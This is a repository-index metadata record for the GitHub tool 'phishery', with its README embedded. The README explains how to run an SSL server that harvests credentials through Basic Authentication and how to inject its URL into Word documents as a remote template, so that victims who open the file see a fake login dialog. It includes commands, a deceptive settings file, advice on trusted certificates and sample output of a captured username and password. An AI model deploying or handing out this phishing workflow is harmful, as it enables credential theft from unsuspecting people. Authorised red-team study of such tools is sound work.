{"id":13721455,"url":"https://github.com/ryhanson/phishery","last_synced_at":"2025-05-07T13:32:50.499Z","repository":{"id":41497710,"uuid":"69138985","full_name":"ryhanson/phishery","owner":"ryhanson","description":"An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector","archived":false,"fork":false,"pushed_at":"2017-09-11T15:42:10.000Z","size":82,"stargazers_count":955,"open_issues_count":8,"forks_count":210,"subscribers_count":47,"default_branch":"master","last_synced_at":"2024-02-15T06:34:04.052Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ryhanson.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-09-25T02:19:24.000Z","updated_at":"2024-02-05T11:55:14.000Z","dependencies_parsed_at":"2022-08-29T11:21:48.516Z","dependency_job_id":null,"html_url":"https://github.com/ryhanson/phishery","commit_stats":null,"previous_names":["ryhanson/go-phish"],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryhanson%2Fphishery","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryhanson%2Fphishery/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryhanson%2Fphishery/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryhanson%2Fphishery/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ryhanson","download_url":"https://codeload.github.com/ryhanson/phishery/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252886935,"owners_count":21819813,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-03T01:01:17.289Z","updated_at":"2025-05-07T13:32:50.129Z","avatar_url":"https://github.com/ryhanson.png","language":"Go","funding_links":[],"categories":["Social Engineering","Social Engineering Tools","Phishing","Tools"],"sub_categories":["Social Engineering Tools","Penetration Testing Report Templates"],"readme":"# phishery\n\nPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. \nPhishery also provides the ability easily to inject the URL into a .docx Word document.\n\n![Basic Auth Dialog in Word](https://raw.githubusercontent.com/ryhanson/phishery/master/screenshots/PhisheryDialog.jpg \"Basic Auth Dialog in Word\")\n\nThe power of phishery is best demonstrated by setting a Word document's template to a phishery URL. This causes \nMicrosoft Word to make a request to the URL, resulting in an Authentication Dialog being shown to the end-user. The\nability to inject any .docx file with a URL is possible using phishery's \n`-i [in docx]`, `-o [out docx]`, and `-u [url]` options.\n\n### Download\nOperating system specific packages can be [downloaded from here](https://github.com/ryhanson/phishery/releases).\n\n### Install\nExtract the archive, and optionally, install binary to $PATH\n\n```bash\n$ tar -xzvf phishery*.tar.gz\n$ cd phishery*\n$ cp phishery /usr/local/bin\n```\n\n### Usage\n```text\n$ phishery --help\n\n|\\   \\\\\\\\__   O         __    _      __\n| \\_/    o \\  o  ____  / /_  (_)____/ /_  ___  _______  __\n\u003e _   (( \u003c_ oO  / __ \\/ __ \\/ / ___/ __ \\/ _ \\/ ___/ / / /\n| / \\__+___/   / /_/ / / / / (__  ) / / /  __/ /  / /_/ /\n|/     |/     / .___/_/ /_/_/____/_/ /_/\\___/_/   \\__, /\n             /_/ Basic Auth Credential Harvester (____/\n                 with Word Doc Template Injector\n\n  Start the server  : phishery -s settings.json -c credentials.json\n  Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx\n\n  Options:\n    -h, --help      Show usage and exit.\n    -v              Show version and exit.\n    -s              The JSON settings file used to setup the server. [default: \"settings.json\"]\n    -c              The JSON file to store harvested credentials. [default: \"credentials.json\"]\n    -u              The phishery URL to use as the Word document template.\n    -i              The Word .docx file to inject with a template URL.\n    -o              The new Word .docx file with the injected template URL.\n```\n\n##### Running the server\nModify the provided settings.json file as needed, by default it should look like this:\n\n```json\n{\n  \"ip\": \"0.0.0.0\",\n  \"port\": \"443\",\n  \"sslCert\": \"server.crt\",\n  \"sslKey\": \"server.key\",\n  \"basicRealm\": \"Secure Document Gateway\",\n  \"responseStatus\": 200,\n  \"responseFile\": \"template.dotx\",\n  \"responseHeaders\": [\n    [\"Content-Type\", \"application/vnd.openxmlformats-officedocument.wordprocessingml.template\"]\n  ]\n}\n```\n\nThis setup will start the HTTP server on Port *443* with SSL configured to use *server.crt* and *server.key*. \nThe basic authentication realm is set to *Secure Document Gateway*.\nWhen any credentials are provided, a *200* response status is sent along with the contents of the included *template.dotx* and\nthe content type header: *Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template*.\n\nThe settings file may also be configured to output a simple body, by using *responseBody*, like this:\n\n```json\n{\n  \"ip\": \"0.0.0.0\",\n  \"port\": \"443\",\n  \"sslCert\": \"server.crt\",\n  \"sslKey\": \"server.key\",\n  \"basicRealm\": \"Secure Document Gateway\",\n  \"responseStatus\": 404,\n  \"responseBody\": \"\u003ch1\u003eNot Found\u003c/h1\u003e\",\n  \"responseHeaders\": [\n    [\"Content-Type\", \"text/html\"]\n  ]\n}\n```\n\nThe effectiveness of this tool is based mostly on the Domain and Basic Auth Realm used, as that is often all the end user \nwill see when triggered from an Office document. Make sure to point your DNS A Records the public IP of the phishery server.\n\nIt's recommended that the provided cert is replaced with a trusted one, such as one generated with \n[LetsEncrypt](https://github.com/certbot/certbot). Microsoft Word on OS X will prevent the auth dialog if the cert is invalid, and Microsoft Word on Windows will prompt the user to accept the invalid certificate.\n\nOnce the server is configured and running, all you need to do is embed a phishery URL in a document, or anywhere\nelse your heart desires. phishery does give you the ability to inject your URL into a Word document as a template, \ninstructions on how to do this can be found below.\n\n##### Injecting a Word Document\nTo inject a Word document with a template URL, you'll need a .docx file and the phishery server URL.\n\nNow run phishery with your document and URL:\n\n```text\n$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx\n[+] Opening Word document: good.docx\n[+] Setting Word document template to: https://secure.site.local/docs\n[+] Saving injected Word document to: bad.docx\n[*] Injected Word document has been saved!\n```\n\nMake sure your phishery server is running and available at the URL you used. Now when the Word document\nis opened, the victim will be prompted with an authentication dialog.\n\nNow when the victim opens the document, you'll see the following:\n\n```text\n$ ./phishery\n[+] Credential store initialized at: credentials.json\n[+] Starting HTTPS Auth Server on: 0.0.0.0:443\n[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs\n[*] Sending Basic Auth response to: 127.0.0.1\n[*] New credentials harvested!\n[HTTP] Host        : secure.example.local\n[HTTP] Request     : /docs\n[HTTP] User Agent  : Microsoft Office Word\n[HTTP] IP Address  : 127.0.0.1\n[AUTH] Username    : john.doe\n[AUTH] Password    : Summer15\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryhanson%2Fphishery","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fryhanson%2Fphishery","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryhanson%2Fphishery/lists"}